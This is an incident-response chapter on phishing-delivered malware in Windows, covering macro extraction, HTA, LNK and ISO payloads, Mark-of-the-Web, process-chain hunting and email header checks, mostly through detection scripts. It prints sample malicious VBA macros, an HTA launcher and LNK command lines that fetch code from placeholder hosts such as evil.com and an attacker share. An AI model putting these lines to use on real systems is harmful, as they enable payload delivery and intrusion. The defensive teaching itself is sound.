Phishing Emails and Malicious File Execution
Phishing email is the most common initial intrusion vector in Windows environments; understanding the complete kill chain from email to payload execution is a core IR capability.
This chapter covers: email delivery mechanisms, Office macro analysis, malicious file formats, the MotW mechanism, process chain analysis, and forensic artifact correlation.
Cross references: 04 Forensic Artifact Analysis | 10 PowerShell Logging and Script Analysis
1. Phishing Kill Chain Overview
1.1 Typical attack chain
```text
Email arrives → user opens attachment / clicks link → macro/script executes → second-stage payload downloaded → persistence → C2 communication
```
- Stage 1: Delivery: the phishing email carries an attachment or a link
- Stage 2: Exploitation: the user enables the macro, opens the malicious file, or clicks the link
- Stage 3: Installation: the follow-on payload is downloaded and executed, and persistence is established
- Stage 4: Command and Control (C2): a callback channel is established
IR goal: find forensic evidence at every stage and reconstruct the complete attack path.
1.2 Common delivery methods
| Method | File type | Characteristics |
|---|---|---|
| Direct attachment | .doc/.docm/.xls/.xlsm | Traditional macro attack |
| Archive attachment | .zip/.rar/.7z (password-protected) | Evades gateway scanning |
| Link download | URL → .exe/.msi/.hta | Evades attachment detection |
| ISO/IMG mount | .iso/.img/.vhd | Evades MotW (older Windows versions) |
| LNK shortcut | .lnk | Disguised with a document icon |
| HTML Smuggling | .html (embedded Base64) | Decoded and dropped in the browser |
| OneNote embedding | .one | Emerging attack surface in 2023 |
2. Office Macro Analysis
2.1 VBA macro basics
Malicious macros usually rely on auto-execution entry points:
- Auto_Open(): runs when the workbook opens (Excel)
- Document_Open(): runs when the document opens (Word)
- Auto_Close() / Document_Close(): run when the file is closed
- Workbook_Open(): Excel event handler
The macro then performs its malicious actions through:
- the Shell() function to start a process
- the WScript.Shell COM object to run commands
- CreateObject("Scripting.FileSystemObject") for file operations
- XMLHTTP / WinHTTP to download files
- invoking PowerShell with an encoded command
2.2 Macro extraction and analysis tools
```cmd
:: Install oletools (Python)
pip install oletools

:: Extract and analyze the VBA macros
olevba suspicious.docm

:: Also decode obfuscated strings (hex, Base64, StrReverse, Chr chains)
olevba --decode suspicious.docm

:: Inspect OLE streams and file-level indicators
oleid suspicious.doc
```
High-risk indicators that olevba flags automatically:
- AutoExec: Auto_Open, Document_Open and other auto-execution entry points
- Suspicious: Shell, CreateObject, Environ, PowerShell
- IOC: URLs, IP addresses, file paths
- Hex Strings: hex-encoded strings (commonly used for obfuscation)
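As an added example (not part of the original chapter and not oletools' own code), the same four-way classification olevba performs, written as a small Python scanner over VBA source text, with the two common string-hiding tricks (hex literals and Chr() chains) decoded so the analyst sees the real command. The VBA sample is constructed for testing and mirrors the macro patterns shown in this chapter:

```python
import re

# Constructed VBA sample for testing, modelled on the macro patterns shown in this chapter
SAMPLE_VBA = r'''Sub Document_Open()
    Dim cmd As String
    cmd = "powershell -nop -w hidden -e " & Chr(83) & Chr(65) & Chr(66)
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run cmd, 0, False
End Sub
Sub Auto_Open()
    x = Environ("COMSPEC")
    Shell x & " /c powershell -ep bypass -f \\attacker\share\payload.ps1", vbHide
End Sub
Private Sub Helper()
    s = "687474703a2f2f6576696c2e636f6d"
End Sub
'''

AUTOEXEC = {"Auto_Open", "Document_Open", "Auto_Close", "Document_Close", "Workbook_Open", "AutoOpen", "AutoExec"}
SUSPICIOUS = ["Shell", "CreateObject", "WScript.Shell", "Environ", "PowerShell", "XMLHTTP", "WinHTTP",
              "ShellExecute", "Chr", "vbHide"]
IOC_RE = re.compile(r'https?://\S+|\\\\[\w.-]+\\[^"\s]+|\b(?:\d{1,3}\.){3}\d{1,3}\b', re.I)
HEX_RE = re.compile(r'"((?:[0-9A-Fa-f]{2}){8,})"')           # quoted run of at least 8 hex bytes
CHR_RE = re.compile(r'Chr\(\d+\)(?:\s*&\s*Chr\(\d+\))+')       # Chr(n) & Chr(n) & ... chains

def triage_vba(src):
    """Classify VBA source into olevba's categories and return a verdict."""
    procs = re.findall(r'^\s*(?:Private\s+|Public\s+)?Sub\s+(\w+)', src, re.M)
    report = {
        "AutoExec": sorted({p for p in procs if p in AUTOEXEC}),
        "Suspicious": sorted(k for k in SUSPICIOUS if re.search(r'\b' + re.escape(k) + r'\b', src, re.I)),
        "IOC": sorted(set(IOC_RE.findall(src))),
        # Decode the hidden strings so the analyst sees what the macro actually runs
        "HexStrings": [bytes.fromhex(h).decode("latin-1") for h in HEX_RE.findall(src)],
        "ChrStrings": ["".join(chr(int(n)) for n in re.findall(r'\d+', m.group())) for m in CHR_RE.finditer(src)],
    }
    if report["AutoExec"] and report["Suspicious"]:
        report["Verdict"] = "high"     # runs by itself and reaches for a shell or COM object
    elif report["Suspicious"] or report["HexStrings"] or report["ChrStrings"]:
        report["Verdict"] = "medium"
    else:
        report["Verdict"] = "low"
    return report

if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```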
Manual VBA extraction (when no tools are available)
```powershell
# A .docm is an Open XML zip; the compiled macros live in word\vbaProject.bin
Copy-Item "suspicious.docm" "suspicious.zip"
Expand-Archive "suspicious.zip" -DestinationPath "C:\IR\docm_extracted"

# Dump the VBA source through the Word COM object. Requires "Trust access to the VBA project
# object model" (AccessVBOM) and must only be done on an isolated analysis VM.
$word = New-Object -ComObject Word.Application
$word.Visible = $false
$word.AutomationSecurity = 3   # msoAutomationSecurityForceDisable: never run the document's macros while opening it
$doc = $word.Documents.Open("C:\IR\suspicious.docm")
foreach ($comp in $doc.VBProject.VBComponents) {
    Write-Host "=== Module: $($comp.Name) ==="
    Write-Host $comp.CodeModule.Lines(1, $comp.CodeModule.CountOfLines)
}
$doc.Close()
$word.Quit()
```
Analysis of a typical malicious macro
```vb
' Example 1: the command string is assembled from Chr() calls to defeat simple string matching,
' then launched with a hidden window (style 0) through WScript.Shell
Sub Document_Open()
    Dim cmd As String
    cmd = "powershell -nop -w hidden -e " & Chr(83) & Chr(65) & Chr(66) & "..."
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run cmd, 0, False
End Sub

' Example 2: Shell() via %COMSPEC%, running a script fetched from a UNC share with the window hidden
Sub Auto_Open()
    x = Environ("COMSPEC")
    Shell x & " /c powershell -ep bypass -f \\attacker\share\payload.ps1", vbHide
End Sub
```
2.3 Checking the macro security policy
```powershell
# Per-user macro settings for Word and Excel (the wildcard covers the installed Office version, e.g. 16.0).
# Values enforced by GPO live under HKCU:\Software\Policies\Microsoft\Office\<version>\Word\Security and take precedence.
Get-ItemProperty "HKCU:\Software\Microsoft\Office\*\Word\Security" -ErrorAction SilentlyContinue |
    Select-Object PSPath, VBAWarnings, AccessVBOM, BlockContentExecutionFromInternet
Get-ItemProperty "HKCU:\Software\Microsoft\Office\*\Excel\Security" -ErrorAction SilentlyContinue |
    Select-Object PSPath, VBAWarnings, AccessVBOM, BlockContentExecutionFromInternet
```
VBAWarnings values:
- 1 = enable all macros (dangerous!)
- 2 = disable all macros with notification (default)
- 3 = enable only digitally signed macros
- 4 = disable all macros without notification
Since 2022 Microsoft blocks Office macros from the Internet (files carrying MotW) by default.
3. Malicious File Formats in Detail
3.1 Office documents (.doc/.docm/.xls/.xlsm/.pptm)
- .doc (OLE format) vs .docx (Open XML): the legacy .doc format can embed macros directly
- .docm/.xlsm explicitly indicate an Open XML document that contains macros
- .xls can also contain Excel 4.0 macros (XLM macros), which do not use VBA and are harder to detect
Excel 4.0 macro detection:
```cmd
:: Detect XLM macros with olevba
olevba --xlm suspicious.xls
:: Dedicated tool: XLMMacroDeobfuscator
pip install XLMMacroDeobfuscator
xlmdeobfuscator -f suspicious.xls
```
3.2 HTA files (.hta)
- HTML Application: executed by mshta.exe, may contain VBScript/JScript
- Not subject to browser security restrictions; runs with local application privileges
```html
<html>
<body>
<script language="VBScript">
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -nop -w hidden -enc JABjAGwA..."
self.close
</script>
</body>
</html>
```
Detection: mshta.exe → cmd.exe / powershell.exe in the process tree is highly suspicious.
```powershell
# 4688: Properties[5] = NewProcessName, [8] = CommandLine, [13] = ParentProcessName.
# CommandLine is only populated when "Include command line in process creation events" is enabled.
# Match mshta.exe both as the new process (what launched it) and as the parent (what it spawned).
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} |
    Where-Object { $_.Properties[5].Value -match 'mshta\.exe' -or $_.Properties[13].Value -match 'mshta\.exe' } |
    Select-Object TimeCreated,
        @{N='ParentProcess';E={$_.Properties[13].Value}},
        @{N='NewProcess';E={$_.Properties[5].Value}},
        @{N='CommandLine';E={$_.Properties[8].Value}}
```
3.3 LNK shortcuts (.lnk)
- The icon can be disguised as a Word/PDF document; double-clicking runs the embedded command
- The target command field is limited (about 260 characters), but several tricks extend it
```powershell
# Read the shortcut fields through the WScript.Shell COM object (this does not execute the target).
# Very long argument strings may be truncated by the COM interface; a dedicated parser such as LECmd recovers the full field.
$shell = New-Object -ComObject WScript.Shell
$lnk = $shell.CreateShortcut("C:\IR\suspicious.lnk")
Write-Host "Target: $($lnk.TargetPath)"
Write-Host "Arguments: $($lnk.Arguments)"
Write-Host "WorkingDir: $($lnk.WorkingDirectory)"
Write-Host "IconLocation: $($lnk.IconLocation)"
Write-Host "Description: $($lnk.Description)"
```
Typical targets of malicious LNK files:
```text
C:\Windows\System32\cmd.exe /c powershell -nop -w hidden -enc JABj...
C:\Windows\System32\mshta.exe http://evil.com/payload.hta
C:\Windows\System32\forfiles.exe /p C:\Windows /m notepad.exe /c "cmd /c powershell..."
```
3.4 ISO/IMG/VHD disk images
- Windows 10+ mounts ISO/IMG files directly on double-click
- Key point: in older Windows versions, files inside a mounted image do not inherit the MotW mark
- Attackers package malicious files inside an ISO to bypass MotW protection
- Since the November 2022 Windows update, files inside an ISO also propagate MotW
Detecting ISO mounts:
```powershell
# The VHDMP operational log records image mounts (ISO/IMG/VHD)
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-VHDMP-Operational'} -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Message -First 20

# Sysmon Event 1 ([4] = Image, [10] = CommandLine): processes whose image lives on a drive letter
# other than C:, which is where a mounted image usually lands. Image is an unquoted full path,
# so match on it rather than on the command line.
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1} |
    Where-Object { $_.Properties[4].Value -match '^[D-Z]:\\' } |
    Select-Object TimeCreated,
        @{N='Image';E={$_.Properties[4].Value}},
        @{N='CommandLine';E={$_.Properties[10].Value}}
```
3.5 Other formats
- .chm (Compiled HTML Help): can embed JS/VBS; executed by hh.exe
- .wsf / .wsh / .vbs / .js: Windows Script Host files; executed by wscript/cscript
- .msi: Windows Installer package; can run arbitrary code through Custom Actions
- .cab: archive; contents can be extracted with expand.exe and executed
- .application / .appref-ms: ClickOnce deployment; can download and run .NET applications
- .one (OneNote): can embed file objects that run on double-click; attacks surged in 2023
Unified detection strategy: monitor child-process creation by uncommon parent processes (hh.exe, wscript.exe, cscript.exe, msiexec.exe).
4. Mark-of-the-Web (MotW) and Zone.Identifier
4.1 The MotW mechanism
- Windows records a file's origin in the NTFS Alternate Data Stream (ADS) named Zone.Identifier
- A file that comes from the Internet (browser download, saved email attachment) is marked ZoneId=3
- MotW triggers Office Protected View and macro blocking
Zone values:
- 0 = Local Machine
- 1 = Local Intranet
- 2 = Trusted Sites
- 3 = Internet (triggers protection)
- 4 = Restricted Sites
4.2 Inspecting Zone.Identifier
```powershell
# Read the ADS of a single file
Get-Content "C:\Users\victim\Downloads\suspicious.docm" -Stream Zone.Identifier
```
```powershell
# Enumerate every file under Downloads that carries a Zone.Identifier stream
Get-ChildItem "C:\Users\*\Downloads\*" -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
    $zone = Get-Content $_.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue
    if ($zone) {
        [PSCustomObject]@{
            File          = $_.FullName
            LastWriteTime = $_.LastWriteTime
            Size          = $_.Length
            ZoneInfo      = ($zone -join ' | ')
        }
    }
} | Format-Table -AutoSize
```
```cmd
:: Use dir /r to list Alternate Data Streams
dir /r "C:\Users\victim\Downloads\"
```
4.3 MotW bypass techniques
- ISO/IMG/VHD mounting: in older Windows versions the mounted contents do not inherit MotW
- Container formats (.7z, .cab): some extraction tools do not propagate MotW
- Manual removal by the user: right-click → Properties → Unblock
- Programmatic removal: the attacker's script calls Unblock-File or deletes the ADS
- CVE-2022-41091: a known MotW bypass vulnerability
Detecting MotW removal:
```powershell
# 4688 command lines that touch the mark (Properties[8] = CommandLine; requires command-line auditing)
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} |
    Where-Object { $_.Properties[8].Value -match 'Unblock-File|Zone\.Identifier' } |
    Select-Object TimeCreated, @{N='Cmd';E={$_.Properties[8].Value}}
```
Also search PowerShell script block logs (Event ID 4104, chapter 10) for the same strings: an Unblock-File call inside a script never appears on a 4688 command line.
4.4 Value of MotW in IR
- ReferrerUrl: the URL the download came from, which may point directly at the phishing page
- HostUrl: the actual download address
- Even after the file is deleted, the ADS record may still be present in the $MFT
- Cross-check the download source against browser history
- If Sysmon is deployed, Event ID 15 (FileCreateStreamHash) records the stream when it is written, so the origin URLs survive even if the ADS is stripped afterwards
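As an added example (not from the original chapter), a Python parser for the Zone.Identifier text that the commands in 4.2 read, plus a triage pass over collected files that applies 4.3 (missing mark on a downloaded Office file) and 4.4 (ReferrerUrl as the pivot back to the phishing page). The stream content and file list are constructed, and every URL is a placeholder:

```python
import configparser

ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites", 3: "Internet", 4: "Restricted Sites"}
RISKY_EXT = (".doc", ".docm", ".xls", ".xlsm", ".pptm", ".one", ".lnk", ".iso", ".img", ".html", ".hta")

# Constructed Zone.Identifier stream as a browser writes it (URLs are placeholders)
SAMPLE_ADS = ("[ZoneTransfer]\r\nZoneId=3\r\n"
              "ReferrerUrl=https://webmail.example.test/inbox/message/42\r\n"
              "HostUrl=https://files.example.test/invoice.docm\r\n")

def parse_zone_identifier(stream_text):
    """Return the ADS fields as a dict, or None when the stream is absent (never marked, or mark removed)."""
    if not stream_text or not stream_text.strip():
        return None
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str                      # keep key case exactly as written
    cp.read_string(stream_text)
    if not cp.has_section("ZoneTransfer"):
        return None
    sec = cp["ZoneTransfer"]
    zone = int(sec.get("ZoneId", "0"))
    return {"ZoneId": zone, "ZoneName": ZONE_NAMES.get(zone, "Unknown"),
            "ReferrerUrl": sec.get("ReferrerUrl"), "HostUrl": sec.get("HostUrl"),
            "ProtectedView": zone >= 3}       # Internet and Restricted zones trigger Protected View / macro block

def triage_files(records):
    """records: [{"path", "stream"}] collected from a Downloads folder. Returns (path, finding) pairs."""
    findings = []
    for rec in records:
        info = parse_zone_identifier(rec["stream"])
        if info is None and rec["path"].lower().endswith(RISKY_EXT):
            findings.append((rec["path"], "no MotW on a downloaded file: stripped, or dropped from a container/ISO"))
        elif info and info["ProtectedView"] and info.get("ReferrerUrl"):
            findings.append((rec["path"], f"ZoneId={info['ZoneId']} via {info['ReferrerUrl']} (pivot to mail/web logs)"))
    return findings

# Constructed file set: one marked download, one Office file with the stream missing, one benign text file
SAMPLE_RECORDS = [
    {"path": r"C:\Users\victim\Downloads\invoice.docm", "stream": SAMPLE_ADS},
    {"path": r"C:\Users\victim\Downloads\statement.xls", "stream": None},
    {"path": r"C:\Users\victim\Downloads\notes.txt", "stream": None},
]

if __name__ == "__main__":
    for path, finding in triage_files(SAMPLE_RECORDS):
        print(f"{path}: {finding}")
```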
5. Process Chain Analysis
5.1 Typical malicious process chains
```text
Normal:   explorer.exe → WINWORD.EXE                       (user double-clicks a document)
Abnormal: WINWORD.EXE → cmd.exe → powershell.exe           (macro execution)
Abnormal: WINWORD.EXE → powershell.exe -enc ...            (direct PowerShell call)
Abnormal: WINWORD.EXE → mshta.exe http:
Abnormal: WINWORD.EXE → certutil.exe -urlcache ...         (payload download)
Abnormal: WINWORD.EXE → rundll32.exe                       (DLL execution)
Abnormal: outlook.exe → WINWORD.EXE → cmd.exe              (email → document → command)
```
Core rule: Office processes (WINWORD.EXE, EXCEL.EXE, POWERPNT.EXE) should never create the following child processes:
- cmd.exe, powershell.exe, pwsh.exe
- mshta.exe, cscript.exe, wscript.exe
- certutil.exe, bitsadmin.exe
- rundll32.exe, regsvr32.exe
- schtasks.exe, net.exe
5.2 Analyzing the process tree with Sysmon
```powershell
$officeProcs = @('WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE', 'MSACCESS.EXE')
$suspiciousChildren = @('cmd.exe', 'powershell.exe', 'pwsh.exe', 'mshta.exe', 'cscript.exe', 'wscript.exe',
                        'certutil.exe', 'bitsadmin.exe', 'rundll32.exe', 'regsvr32.exe', 'schtasks.exe')

# Sysmon Event 1 property indexes (Sysmon 10+): [4] Image, [10] CommandLine, [12] User, [20] ParentImage
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1} | ForEach-Object {
    $parentImage = Split-Path $_.Properties[20].Value -Leaf
    $childImage  = Split-Path $_.Properties[4].Value -Leaf
    if ($officeProcs -contains $parentImage -and $suspiciousChildren -contains $childImage) {
        [PSCustomObject]@{
            Time          = $_.TimeCreated
            ParentProcess = $_.Properties[20].Value
            ChildProcess  = $_.Properties[4].Value
            CommandLine   = $_.Properties[10].Value
            User          = $_.Properties[12].Value
        }
    }
} | Format-List
```
5.3 Analysis with the Security log (when Sysmon is not available)
```powershell
# 4688 property indexes: [1] SubjectUserName, [5] NewProcessName, [8] CommandLine, [13] ParentProcessName
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} |
    Where-Object {
        $newProc    = $_.Properties[5].Value
        $parentProc = $_.Properties[13].Value
        ($parentProc -match 'WINWORD|EXCEL|POWERPNT|OUTLOOK') -and
        ($newProc -match 'cmd\.exe|powershell|mshta|cscript|wscript|certutil|rundll32')
    } |
    Select-Object TimeCreated,
        @{N='Parent';E={$_.Properties[13].Value}},
        @{N='NewProcess';E={$_.Properties[5].Value}},
        @{N='CommandLine';E={$_.Properties[8].Value}},
        @{N='User';E={$_.Properties[1].Value}} |
    Format-List
```
5.4 Rebuilding the process chain
Recommended tools:
- Process Monitor (ProcMon): real-time monitoring; Boot Logging can be enabled
- Sysmon + SysmonView: visual process tree
- Timeline Explorer: load CSV output for timeline analysis
- APT-Hunter: automated evtx analysis that flags suspicious process chains
Rebuilding the process tree manually:
```powershell
$procs = Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1} |
    Select-Object TimeCreated,
        @{N='PID';E={$_.Properties[3].Value}},
        @{N='Image';E={$_.Properties[4].Value}},
        @{N='CommandLine';E={$_.Properties[10].Value}},
        @{N='ParentPID';E={$_.Properties[19].Value}},
        @{N='ParentImage';E={$_.Properties[20].Value}}

function Get-ProcessChain {
    param([string]$TargetPID)
    $chain = @()
    # PIDs are reused: Get-WinEvent returns newest first, so -First 1 picks the latest creation of this PID
    $current = $procs | Where-Object { $_.PID -eq $TargetPID } | Select-Object -First 1
    while ($current) {
        $chain += $current
        # The parent must have been created no later than the child; this keeps a reused PID from being attached
        $current = $procs |
            Where-Object { $_.PID -eq $chain[-1].ParentPID -and $_.TimeCreated -le $chain[-1].TimeCreated } |
            Select-Object -First 1
        if ($chain.Count -gt 20) { break }   # depth guard against cycles
    }
    $chain | Format-Table TimeCreated, PID, ParentPID, Image, CommandLine -AutoSize
}
```
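The parent-child reasoning from 5.1 through 5.4, as an added Python example (not the chapter's code) that runs offline over exported Sysmon Event 1 records: it applies the Office-parent rule from 5.1 and walks a process back to its root the way Get-ProcessChain does, while respecting PID reuse, which a naive first-match lookup gets wrong. The event list is constructed and the command lines are placeholders:

```python
OFFICE = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE", "MSACCESS.EXE"}
SUSPICIOUS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "cscript.exe", "wscript.exe",
              "certutil.exe", "bitsadmin.exe", "rundll32.exe", "regsvr32.exe", "schtasks.exe", "net.exe"}
OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"

def ev(time, pid, image, ppid, parent, cmd):
    """One Sysmon Event 1 record (UtcTime, ProcessId, Image, ParentProcessId, ParentImage, CommandLine)."""
    return {"time": time, "pid": pid, "image": image, "ppid": ppid, "parent": parent, "cmd": cmd}

# Constructed events from one day, in write order (times compare correctly as strings)
EVENTS = [
    ev("09:00:00", 4100, r"C:\Windows\explorer.exe", 900, r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    ev("09:01:00", 5200, OFFICE_DIR + r"\OUTLOOK.EXE", 4100, r"C:\Windows\explorer.exe", "OUTLOOK.EXE"),
    ev("09:05:00", 6300, OFFICE_DIR + r"\WINWORD.EXE", 5200, OFFICE_DIR + r"\OUTLOOK.EXE", 'WINWORD.EXE /n "invoice.docm"'),
    ev("09:05:10", 7400, r"C:\Windows\System32\cmd.exe", 6300, OFFICE_DIR + r"\WINWORD.EXE", "cmd /c powershell -enc ..."),
    ev("09:05:11", 7500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 7400,
       r"C:\Windows\System32\cmd.exe", "powershell -nop -w hidden -enc ..."),
    # Hours later PID 7400 is reused by an unrelated process: a chain walk must not attach it to the macro
    ev("11:30:00", 7400, r"C:\Windows\System32\notepad.exe", 4100, r"C:\Windows\explorer.exe", "notepad.exe"),
]

def leaf(path):
    return path.rsplit("\\", 1)[-1]

def office_spawns(events):
    """Rule from 5.1: an Office parent creating an interpreter or LOLBin child is an alert."""
    return [e for e in events if leaf(e["parent"]).upper() in OFFICE and leaf(e["image"]).lower() in SUSPICIOUS]

def creation_event(events, pid, at_time):
    """Newest creation event for `pid` that is not later than `at_time` (this is what handles PID reuse)."""
    cands = [e for e in events if e["pid"] == pid and e["time"] <= at_time]
    return max(cands, key=lambda e: e["time"]) if cands else None

def walk_chain(events, pid, at_time, max_depth=20):
    """Process images from the root ancestor down to `pid`, as Get-ProcessChain in 5.4 does."""
    chain, cur = [], creation_event(events, pid, at_time)
    while cur and len(chain) < max_depth:           # depth guard, like the chapter's 20-step limit
        chain.append(leaf(cur["image"]))
        cur = creation_event(events, cur["ppid"], cur["time"])
    return chain[::-1]

if __name__ == "__main__":
    for hit in office_spawns(EVENTS):
        print("ALERT:", " -> ".join(walk_chain(EVENTS, hit["pid"], hit["time"])), "|", hit["cmd"])
```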
6. Forensic Artifact Correlation
6.1 Prefetch analysis
- Prefetch records program execution history (path: C:\Windows\Prefetch\)
- Key information: program name, run count, last execution time, list of files/directories loaded
```powershell
# Prefetch files are named <EXE>-<hash>.pf; list the ones for interpreters and LOLBins, newest first
$suspiciousNames = @('POWERSHELL', 'CMD', 'MSHTA', 'CSCRIPT', 'WSCRIPT', 'CERTUTIL', 'BITSADMIN', 'RUNDLL32', 'REGSVR32')
$pattern = $suspiciousNames -join '|'
Get-ChildItem "C:\Windows\Prefetch\*.pf" |
    Where-Object { $_.BaseName.ToUpper() -match $pattern } |
    Select-Object Name, LastWriteTime, CreationTime, Length |
    Sort-Object LastWriteTime -Descending
```
Parsing Prefetch with PECmd (Eric Zimmerman):
```cmd
PECmd.exe -d "C:\Windows\Prefetch" --csv "C:\IR\" -q
:: Output includes execution times, run count, and the list of files loaded
```
IR value: the file-reference list inside a Prefetch entry can reveal the full path of the malicious document (for example C:\Users\victim\Downloads\invoice.docm).
6.2 Amcache analysis
- Amcache.hve records program execution history and file metadata (including the SHA1 hash!)
- Path: C:\Windows\AppCompat\Programs\Amcache.hve
- IR value: the SHA1 recorded in Amcache can be submitted directly to VT or a malware analysis platform
6.3 Shimcache (AppCompatCache)
- Records whether a program existed on the system (not necessarily that it executed)
- Stored in the registry: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache
6.4 RecentDocs and JumpLists
```powershell
# Recently opened documents by extension (MRU kept in the registry; values are REG_BINARY with the
# file name as the leading UTF-16 string)
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.docm" -ErrorAction SilentlyContinue
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.doc" -ErrorAction SilentlyContinue

# Shortcuts Explorer writes for recently opened files
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Recent\*.lnk" |
    Sort-Object LastWriteTime -Descending |
    Select-Object Name, LastWriteTime -First 30
```
JumpList analysis:
```powershell
Get-ChildItem "$env:APPDATA\Microsoft\Windows\Recent\AutomaticDestinations\*.automaticDestinations-ms" |
    Sort-Object LastWriteTime -Descending |
    Select-Object Name, LastWriteTime
```
6.5 Sysmon event correlation
| Event ID | Purpose |
|---|---|
| 1 | Process creation (full command line + parent process + hashes) |
| 3 | Network connection (payload download) |
| 7 | Image Load (DLL loading; detects DLL injection) |
| 11 | File creation (payload dropped to disk) |
| 15 | FileCreateStreamHash (ADS creation, including MotW) |
| 22 | DNS query (C2 domain resolution) |
| 23 | File deletion (attacker cleaning up traces) |
```powershell
# Event 11 (FileCreate) property indexes: [4] Image, [5] TargetFilename. Files written by Office processes.
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=11} |
    Where-Object { $_.Properties[4].Value -match 'WINWORD|EXCEL|POWERPNT' } |
    Select-Object TimeCreated,
        @{N='Process';E={$_.Properties[4].Value}},
        @{N='TargetFile';E={$_.Properties[5].Value}} |
    Format-List

# Event 15 (FileCreateStreamHash) property indexes: [4] Image, [5] TargetFilename, [7] Hash, [8] Contents.
# For a Zone.Identifier stream, Contents holds the ZoneId/ReferrerUrl/HostUrl text (Sysmon 11+).
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=15} |
    Select-Object TimeCreated,
        @{N='Process';E={$_.Properties[4].Value}},
        @{N='TargetFile';E={$_.Properties[5].Value}},
        @{N='Hash';E={$_.Properties[7].Value}},
        @{N='Contents';E={$_.Properties[8].Value}} -First 20
```
7. Email Header Analysis Basics
7.1 Key header fields
```text
Return-Path: <actual-sender@evil.com>        ← envelope sender, i.e. the server that actually sent the mail
Received: from mail.evil.com (1.2.3.4)       ← delivery path (read from bottom to top)
From: "CEO Name" <ceo@company.com>           ← display name and address (can be forged!)
Reply-To: attacker@evil.com                  ← reply address (highly suspicious when it differs from From)
Message-ID: <unique@sender-domain>           ← unique message identifier
X-Originating-IP: 1.2.3.4                    ← sender's original IP (added by some mail servers)
Authentication-Results:                      ← SPF/DKIM/DMARC verification results
```
7.2 SPF/DKIM/DMARC checks
- SPF (Sender Policy Framework): checks whether the sending IP is listed in the sender domain's SPF record
- DKIM (DomainKeys Identified Mail): verifies that the message signature matches the domain's public key
- DMARC: a policy built on SPF + DKIM that defines what to do when verification fails
```text
Authentication-Results: mx.company.com;
  spf=fail (sender IP 1.2.3.4 not permitted)     ← SPF failure = suspicious
  dkim=fail (signature not valid)                ← DKIM failure = suspicious
  dmarc=fail (p=reject)                          ← DMARC failure = suspicious
```
Note that SPF is evaluated against the Return-Path (envelope) domain, so a message sent from the attacker's own domain can pass SPF while the From header is spoofed; DMARC alignment is what ties the result to the From domain.
All three checks failing → very likely a forged/malicious email.
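As an added Python example (not from the original chapter), the header checks from 7.1 and 7.2 applied to a raw message with Python's standard email parser: it extracts the SPF/DKIM/DMARC verdicts from Authentication-Results and flags the Reply-To and Return-Path mismatches the chapter describes. The message is constructed, and every domain and IP in it is a placeholder:

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed message: display-name spoof of an internal address, with the real sender elsewhere
RAW_MSG = """Return-Path: <billing@evil.example>
Received: from mail.evil.example (mail.evil.example [192.0.2.10]) by mx.company.example
Authentication-Results: mx.company.example;
 spf=fail (sender IP 192.0.2.10 not permitted) smtp.mailfrom=evil.example;
 dkim=fail (signature not valid) header.d=evil.example;
 dmarc=fail (p=reject) header.from=company.example
From: "CEO Name" <ceo@company.example>
Reply-To: ceo.office@evil.example
To: victim@company.example
Subject: Urgent invoice
Message-ID: <20240110.42@evil.example>

Please see the attached invoice.
"""

def domain(addr):
    return parseaddr(addr)[1].rsplit("@", 1)[-1].lower()

def auth_results(msg):
    """spf/dkim/dmarc verdicts from Authentication-Results; 'missing' when the receiver did not evaluate one."""
    hdr = " ".join(msg.get_all("Authentication-Results", []))
    out = {}
    for method in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{method}=(\w+)", hdr)
        out[method] = m.group(1).lower() if m else "missing"
    return out

def triage_headers(raw):
    msg = message_from_string(raw)
    auth = auth_results(msg)
    flags = [f"{k}={v}" for k, v in auth.items() if v != "pass"]
    from_addr = parseaddr(msg.get("From", ""))[1]
    from_dom = domain(from_addr)
    for header in ("Reply-To", "Return-Path"):          # both normally share the From domain
        value = msg.get(header)
        if value and domain(value) != from_dom:
            flags.append(f"{header} domain {domain(value)} differs from From domain {from_dom}")
    # Chapter rule: all three checks failing means the message is very likely forged
    verdict = "likely forged" if all(v != "pass" for v in auth.values()) else "review"
    return {"from": from_addr, "auth": auth, "flags": flags, "verdict": verdict}

if __name__ == "__main__":
    print(triage_headers(RAW_MSG))
```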
7.3 Extracting emails from Exchange/Outlook
```powershell
# Search the current user's Inbox through the Outlook COM object (6 = olFolderInbox)
$outlook = New-Object -ComObject Outlook.Application
$namespace = $outlook.GetNamespace("MAPI")
$inbox = $namespace.GetDefaultFolder(6)
$inbox.Items |
    Where-Object { $_.SenderEmailAddress -match 'evil\.com' } |
    Select-Object Subject, SenderEmailAddress, ReceivedTime,
        @{N='Attachments';E={ ($_.Attachments | ForEach-Object { $_.FileName }) -join ', ' }} |
    Format-List
```
